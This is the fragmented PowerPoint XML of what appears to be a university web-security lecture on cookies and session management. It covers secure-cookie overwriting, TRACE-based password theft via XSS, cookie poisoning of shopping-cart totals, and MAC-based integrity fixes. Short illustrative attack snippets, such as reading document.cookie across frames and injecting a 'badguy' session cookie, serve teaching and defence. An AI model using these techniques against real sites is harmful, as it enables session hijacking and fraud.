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629" r:id="rId31"/>
    <p:sldId id="630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20" r:id="rId42"/>
    <p:sldId id="621" r:id="rId43"/>
    <p:sldId id="622" r:id="rId44"/>
    <p:sldId id="623" r:id="rId45"/>
    <p:sldId id="624" r:id="rId46"/>
    <p:sldId id="625" r:id="rId47"/>
    <p:sldId id="626" r:id="rId48"/>
    <p:sldId id="627" r:id="rId49"/>
    <p:sldId id="628" r:id="rId50"/>
    <p:sldId id="579" r:id="rId5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9928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encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> with integrity.    Encryption by itself is insecure.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DA3C-7DA1-2C42-9F3E-0A8EBF0103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TRACE method:  causes web server to reflect HTTP request back to client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TRACE via XHR reveals the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s password to script on the page, which can then be stolen via XSS.</a:t>
            </a:r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7B73D39-3EDF-4E4A-A1A5-303342A23E29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5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DOM property is bad idea:   not private,  short sessions only,  not usable if user connects to site from another window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833B9CB5-D65B-5D45-BBCA-0E3DA9716CF2}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28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9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session and re use since server never deleted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Site with thousand server will have to clear the data based over thousand servers to they just save their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1FD750BB-E7FC-4541-B9D6-B6E3421DB1C5}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t generate your own.   Use built in procedures:   ASP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JServ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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8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Problems with new SessionToken after every request:     the back button   (but can be dealt with with proper handling of replays)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426B7281-6D6F-BD46-9330-B29402EA8B2B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Enc-then-MAC:   provides both confidentiality and integrity.   Use CCM as an example encrypt-then-MAC method.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54D0A226-8247-ED4B-A780-4B79EB6A46D5}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39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0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7F9BB-ABC4-4AD0-AEFC-F818B1541A1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FF2, Chrome:    HttpOnly cookie can be overwritten to by script    (but cannot be read)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235547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3363" indent="-233363"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3rd party cookies often used for session management.   Consider yahoo.com.   It is a 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>  party when accessing from yahoo.com but a 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> party when accessing from yahoo.co.uk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A18CE-BB9F-44C9-A9D3-440DB853C8DF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723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06EF9F4-663B-6948-AD15-7A59EC6F8493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46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becomes first party by doing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="233926" indent="-233926">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = “3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party address”,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="233926" indent="-233926">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="233926" indent="-233926">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> back to original value (obtained from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header)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771C7-4431-494B-8141-7FA8B0FDC914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151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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FF3:   most specific cookie sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>U2 sent because it is less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>restrictrive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:ea typeface="MS PGothic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60D2CF9F-A123-8F43-A6B4-49D60A089230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9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SOP:    same as server-side read/write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A264AB3-18A0-7748-BEBE-282D39B76C46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9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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>RFC 2109 (cookie RFC) has an option for including domain, path in Cookie header, but not supported by browsers.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Both LSID and GAUSR are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> cookies;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Alice visits   http://www.google.com  automatically due to phishing filter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958183BE-86C0-7049-846C-E214A4140741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8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1AE6F7F2-1F44-E141-A95B-E454CD6A5727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4023146" y="9723225"/>
            <a:ext cx="3076154" cy="5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48" tIns="47674" rIns="95348" bIns="47674" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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3C50A27B-FA68-7E48-90D2-BE12130F1B70}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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48" tIns="47674" rIns="95348" bIns="47674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2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FCE73060-83BE-9F43-9A03-D5CFB88DF4C6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4023146" y="9723225"/>
            <a:ext cx="3076154" cy="5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48" tIns="47674" rIns="95348" bIns="47674" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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F89B5E80-7644-F34D-A8A0-0EC2ABEC5D76}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300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48" tIns="47674" rIns="95348" bIns="47674"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All these shopping carts stored data on browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250582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900">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>non-keyed checksums (e.g. CRC) are insufficient for this purpose !!</a:t>
            </a:r>
          </a:p>
          <a:p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3B991D2A-6F2D-9A4F-BE1A-C2CEFA382623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475-E83E-460E-A8B1-F1C3CB79689B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B29-7FC3-4100-A48B-7AB0D5546AFF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357-1D00-4694-8738-8ED716C2E81F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0A01-70E6-4926-832C-B874336DEDEA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DEC6-832B-4FA5-8DD3-3BBDCF3B5B6C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C79-8668-4331-8C98-9775F95BC53C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4A2-B7D1-4B56-A5D7-2C929AD78F83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44E7-9D76-4158-9AC8-40FA12ACE1E4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6169-F30D-4C6F-A608-D0A2997A2EFC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DC-69AD-4835-A972-C7FCE991787B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BAB-F09C-4006-85D6-004928518FFB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BD2F2-38E5-44DF-9B56-CDB5DD331D2C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17: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Session Management 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Client side read/write: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document.cookie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(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dom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element)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Setting a cookie in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document.cookie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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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name=value;  expires=…; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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Reading a cookie:	  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alert(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document.cookie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prints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string containing all cookies available for 	document    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(based on [protocol], domain, path)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Deleting a cookie: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document.cookie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=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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name=;  expires= Thu, 01-Jan-70</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7030A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endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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5562600"/>
            <a:ext cx="756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often used to customize page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1524000" y="1828800"/>
            <a:ext cx="5317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javascript:  alert(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37500" r="19531" b="41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="808038" y="2743200"/>
            <a:ext cx="8031162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14340" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2365375" y="1039813"/>
            <a:ext cx="1765300" cy="852487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1756563 w 1765738"/>
              <a:gd name="T1" fmla="*/ 0 h 851338"/>
              <a:gd name="T2" fmla="*/ 564612 w 1765738"/>
              <a:gd name="T3" fmla="*/ 275716 h 851338"/>
              <a:gd name="T4" fmla="*/ 0 w 1765738"/>
              <a:gd name="T5" fmla="*/ 875795 h 851338"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1765738"/>
              <a:gd name="T10" fmla="*/ 0 h 851338"/>
              <a:gd name="T11" fmla="*/ 1765738 w 1765738"/>
              <a:gd name="T12" fmla="*/ 851338 h 851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5738" h="851338">
                <a:moveTo>
                  <a:pt x="1765738" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1313793" y="63062"/>
                  <a:pt x="861848" y="126124"/>
                  <a:pt x="567558" y="268014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="273268" y="409904"/>
                  <a:pt x="136634" y="630621"/>
                  <a:pt x="0" y="8513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4114800" y="762000"/>
            <a:ext cx="183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URL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2362200" y="5562600"/>
            <a:ext cx="44710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Displays all cookies for current document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28000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Viewing/deleting cookies in Browser UI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2938"/>
            <a:ext cx="51863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191000" y="4646613"/>
            <a:ext cx="2514600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B3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29000" y="5408613"/>
            <a:ext cx="1219200" cy="381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Cookie Protocol Problems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1066800" y="3124200"/>
            <a:ext cx="77724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Server is blind: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Does not see cookie attributes  (e.g. secure)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Does not see which domain set the cookie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0" y="5181600"/>
            <a:ext cx="602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Server only sees:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie:  NAME=VALUE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Example 1:  login server problems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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="168275" indent="-331788">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"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Alice logs in at   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login.site.com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</a:t>
            </a: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login.site.com  sets session-id cookie for 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site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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168275" indent="-331788">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"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Alice visits  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evil.site.com</a:t>
            </a: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overwrites    .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site.com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 session-id cookie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with session-id of user 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badguy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endParaRPr lang="en-US" altLang="ja-JP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168275" indent="-331788">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"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Alice visits  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cs155.site.com  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to submit homework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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cs155.site.com thinks it is talking to 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badguy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endParaRPr lang="en-US" altLang="ja-JP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 cs155 expects session-id from  login.site.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="168275" indent="-331788">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="568325" algn="l"/>
                <a:tab pos="1198563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	   cannot tell that session-id cookie was overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="168275" indent="-331788">
              <a:tabLst>
                <a:tab pos="568325" algn="l"/>
                <a:tab pos="1198563" algn="l"/>
              </a:tabLst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76800"/>
            <a:ext cx="8486775" cy="100965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077200" cy="9144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Example 2:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="280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sz="28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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="280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sz="28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cookies are not secure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1143000"/>
            <a:ext cx="8315325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Alice logs in at    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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://www.google.com/accounts</a:t>
            </a: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Alice visits     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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://www.google.com  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cleartext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Network attacker can inject into response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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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Set-Cookie:  LSID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1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badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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; secure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and overwrite secure cookie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Problem:   network attacker can re-write HTTPS cookies !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  <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>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HTTPS cookie value cannot be trusted</a:t>
            </a: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t="48659" r="32237" b="38725"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1600200"/>
            <a:ext cx="82391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28600" y="3200400"/>
            <a:ext cx="8382000" cy="1828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934200" y="2846388"/>
            <a:ext cx="2209800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Rounded Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2362200"/>
            <a:ext cx="6553200" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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Interaction with the DOM SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194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Cookie SOP:        path separation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   x.com/A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 does not see cookies of     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7379C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x.com/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7379C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Not a security measure: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DOM SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666699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:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666699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x.com/A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666699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has access to DOM of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666699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x.com/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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iframe</a:t>
            </a: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en-US" altLang="ko-KR" b="1" dirty="0" err="1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src</a:t>
            </a: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=“x.com/B"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1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iframe</a:t>
            </a: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&gt;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Gulim" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		a</a:t>
            </a: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lert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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ko-KR" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>Path separation is done for efficiency not security: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ko-KR" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>		x.com/A    is only sent the cookies it needs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666699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19460" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3505200"/>
            <a:ext cx="59436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Cookies have no Integrity !!!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772400" cy="80803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Storing security data on browser?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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1219200"/>
            <a:ext cx="8407400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450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User can change and delete cookie values !!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl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Edit cookie file    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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FF:  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cookies.sqlite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</a:p>
          <a:p>
            <a:pPr marL="571500" lvl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Modify Cookie header   (FF:  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TamperData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extension)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450">
              <a:spcBef>
                <a:spcPts val="24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Silly example: shopping cart software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="17145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  Set-cookie:	shopping-cart-total = 150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($)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450">
              <a:spcBef>
                <a:spcPts val="18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User edits cookie file  (cookie poisoning):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="17145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   Cookie:	shopping-cart-total = 15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  ($)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450">
              <a:spcBef>
                <a:spcPts val="240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Similar to problem with hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1">
              <a:spcBef>
                <a:spcPct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&lt;INPUT TYPE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" b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sz="2000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hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" b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sz="2000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NAME=price VALUE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" b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sz="2000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150</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" b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sz="2000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/>
            <a:fld id="{5689C302-95ED-9F4D-B282-165BBFB722F8}" type="slidenum">
              <a:rPr lang="en-GB" sz="1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GB" sz="1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01D175B-A45F-3749-B7D6-23465F98BD16}" type="slidenum">
              <a:rPr lang="en-GB" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1000" b="1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772400" cy="808038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Historical problems …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(circa 2000)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D3.COM Pty Ltd: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ShopFactory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5.8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@Retail Corporation: @Retail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Adgrafix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: Check It Out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Baron Consulting Group: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WebSite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Tool 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ComCity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Corporation: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SalesCart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Crested Butte Software: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EasyCart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Dansie.net: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Dansie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Shopping Cart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Intelligent Vending Systems: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Intellivend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Make-a-Store: Make-a-Store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OrderPage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McMurtrey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/Whitaker &amp; Associates: Cart32 3.0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pknutsen@nethut.no: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CartMan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1.04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Rich Media Technologies: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JustAddCommerce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5.0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SmartCart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SmartCart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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tabLst>
                <a:tab pos="4572000" algn="l"/>
              </a:tabLst>
            </a:pP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Web Express: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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Shoptron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 1.2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Wingdings" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4572000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000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638800"/>
            <a:ext cx="56435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Source:    http://xforce.iss.net/xforce/xfdb/4621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Web Session Management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Session Management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Session Hijacking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User Tracking</a:t>
            </a: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Solution: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Cryptographic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hecksums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25024" y="5562600"/>
            <a:ext cx="7140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ja-JP" altLang="en-US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should also contain data to prevent cookie replay and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swap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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like Session ID (SID)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TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="6508513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ntegrity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Requires secret key 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unknown to browser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3124200"/>
            <a:ext cx="1524000" cy="1219200"/>
            <a:chOff x="1066800" y="1828800"/>
            <a:chExt cx="1524000" cy="1219200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 dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="808000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Browser</a:t>
              </a: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7315200" y="3048000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23559" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8534400" y="3209925"/>
            <a:ext cx="363538" cy="523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71713" y="3276603"/>
            <a:ext cx="5119687" cy="457143"/>
            <a:chOff x="2195514" y="3733800"/>
            <a:chExt cx="5119687" cy="457200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286001" y="3811598"/>
              <a:ext cx="2270173" cy="36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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="808000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
